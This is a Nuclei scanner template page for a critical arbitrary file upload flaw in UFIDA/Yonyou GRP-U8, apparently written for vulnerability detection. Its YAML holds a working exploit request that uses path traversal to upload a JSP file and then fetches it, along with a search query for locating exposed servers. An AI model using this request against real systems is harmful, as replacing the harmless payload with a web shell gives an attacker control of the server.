Skip to content
Nuclei Templates

UFIDA GRP-U8 UploadFileData - Arbitrary File Upload

ID: grp-u8-uploadfiledata

Severity: critical

Author: SleepingBag945

Tags: yonyou,fileupload,grp,intrusive

Description

Section titled “Description”

File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.

YAML Source

Section titled “YAML Source”
id: grp-u8-uploadfiledata


info:
  name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
  reference:
    - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
  metadata:
    verified: true
    max-request: 2
    fofa-query: title="用友GRP-U8行政事业内控管理软件"
  tags: yonyou,fileupload,grp,intrusive


http:
  - raw:
      - |
        POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 327
        Accept: */*
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
        Accept-Encoding: gzip


        ------WebKitFormBoundaryqoqnjtcw
        Content-Disposition: form-data; name="upload"; filename="emgeyr.jsp"
        Content-Type: application/octet-stream


        <% {out.print("{{randstr_2}}");} %>
        ------WebKitFormBoundaryqoqnjtcw
        Content-Disposition: form-data; name="submit"


        submit
        ------WebKitFormBoundaryqoqnjtcw--
      - |
        GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip


    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
          - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
        condition: and
# digest: 490a004630440220471ea630cdc503fc3765f30a209a04334c413a0bb973af2849433318aad89ff8022036ad6864a9b29fc68cce3840c7743f5ba15bf51f709335002de7ec3f92a6073c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml"

View on Github